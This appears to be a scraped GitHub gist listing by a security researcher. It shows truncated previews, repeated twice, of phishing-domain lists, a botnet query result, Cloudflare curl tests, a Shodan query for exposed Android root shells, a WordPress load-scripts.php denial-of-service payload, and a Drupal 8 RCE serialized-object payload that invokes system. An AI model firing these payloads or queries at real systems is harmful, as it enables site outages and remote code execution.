theMiddle theMiddleBlue

## global_phishing_domain
http://www.123gouter.fr
http://www.50ansdecine.fr
http://www.abigaely-voyance.fr
http://www.accueil-funeraire.fr
http://www.ace-renov.fr
http://www.achterhoek.nu
http://www.active-health.nl
http://www.addam-31.fr
http://www.adevesoiree.fr
http://www.adhi.es

## italian_phishing_domain
http://www.adsilazio.it
http://www.al-parco.it
http://www.aneurysm.it
http://www.anonimoitaliano.it
http://www.ardaland.it
http://www.ascdiromagna.it
http://www.battagliamontecassino.it
http://www.biellaintraprendere.it
http://www.cabarun.it
http://www.calzaturificiorenata.it

## botnet_list.json
{
  "took": 103,
  "timed_out": false,
  "_shards": {
    "total": 304,
    "successful": 304,
    "failed": 0
  },
  "hits": {
    "total": 898,

## cfdenied.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                theMiddleBlue
                / cfdenied.md
            
            
              Last active
              August 9, 2017 20:25
            
              
                cloudflare forwarding denied
              
          
    theMiddlePro:~ root# curl -k -v --resolve corriere.it:80:104.24.99.193 'http://corriere.it/'
* Added corriere.it:80:104.24.99.193 to DNS cache
* Hostname corriere.it was found in DNS cache
*   Trying 104.24.99.193...
* TCP_NODELAY set
* Connected to corriere.it (104.24.99.193) port 80 (#0)
> GET / HTTP/1.1
> Host: corriere.it
> User-Agent: curl/7.54.0

  
## cfok.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                theMiddleBlue
                / cfok.md
            
            
              Created
              August 9, 2017 20:28
            
              
                cloudflare forward ok
              
          
    theMiddlePro:~ root# curl -v --resolve corriere.it:80:104.27.143.145 'http://corriere.it/'
* Added corriere.it:80:104.27.143.145 to DNS cache
* Hostname corriere.it was found in DNS cache
*   Trying 104.27.143.145...
* TCP_NODELAY set
* Connected to corriere.it (104.27.143.145) port 80 (#0)
> GET / HTTP/1.1
> Host: corriere.it
> User-Agent: curl/7.54.0

  
## shodan.py
import httplib, urllib, re, sys, json, socket, struct

# python shodan.py 0
#                  ^ this is the page number

shodan = {
	'apikey': '<your shodan API key>',
	'query': r'"root%40"+"android"+port%3A23',
}

## dos.py
import requests, sys

payload = '/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-

## telegram_webhook.php
<?php
  if(!preg_match('/^149\.154\.167\.(19[7-9]|20[0-9]|21[0-9]|22[0-9]|23[0-3])$/', $_SERVER['REMOTE_ADDR'])) {
    die('IP Address not allowed.');
  }

  if($_SERVER['REQUEST_METHOD'] != 'POST') {
    die('Request method not allowed.');
  }

  $token = '<bot token here>';

## tt.php
<?php

	if(isset($_POST['photo'])) {
		// echo $_POST['photo'];

		file_put_contents('/usr/local/openresty/nginx/html/test.jpg', base64_decode($_POST['photo']));

		exec("curl -s -X POST -F 'file=@/usr/local/openresty/nginx/html/test.jpg' http://192.168.1.4:8080/facebox/check", $a);

		echo(implode('', $a));

## drupal8rce.json
{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href": "http://localhost/rest/type/shortcut/default"
	http://www.123gouter.fr
	http://www.50ansdecine.fr
	http://www.abigaely-voyance.fr
	http://www.accueil-funeraire.fr
	http://www.ace-renov.fr
	http://www.achterhoek.nu
	http://www.active-health.nl
	http://www.addam-31.fr
	http://www.adevesoiree.fr
	http://www.adhi.es
	http://www.adsilazio.it
	http://www.al-parco.it
	http://www.aneurysm.it
	http://www.anonimoitaliano.it
	http://www.ardaland.it
	http://www.ascdiromagna.it
	http://www.battagliamontecassino.it
	http://www.biellaintraprendere.it
	http://www.cabarun.it
	http://www.calzaturificiorenata.it
	{
	"took": 103,
	"timed_out": false,
	"_shards": {
	"total": 304,
	"successful": 304,
	"failed": 0
	},
	"hits": {
	"total": 898,
	import httplib, urllib, re, sys, json, socket, struct

	# python shodan.py 0
	# ^ this is the page number

	shodan = {
	'apikey': '<your shodan API key>',
	'query': r'"root%40"+"android"+port%3A23',
	}
	import requests, sys

	payload = '/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-
	<?php
	if(!preg_match('/^149\.154\.167\.(19[7-9]\|20[0-9]\|21[0-9]\|22[0-9]\|23[0-3])$/', $_SERVER['REMOTE_ADDR'])) {
	die('IP Address not allowed.');
	}

	if($_SERVER['REQUEST_METHOD'] != 'POST') {
	die('Request method not allowed.');
	}

	$token = '<bot token here>';
	<?php

	if(isset($_POST['photo'])) {
	// echo $_POST['photo'];

	file_put_contents('/usr/local/openresty/nginx/html/test.jpg', base64_decode($_POST['photo']));

	exec("curl -s -X POST -F 'file=@/usr/local/openresty/nginx/html/test.jpg' http://192.168.1.4:8080/facebox/check", $a);

	echo(implode('', $a));
	{
	"link": [
	{
	"value": "link",
	"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
	}
	],
	"_links": {
	"type": {
	"href": "http://localhost/rest/type/shortcut/default"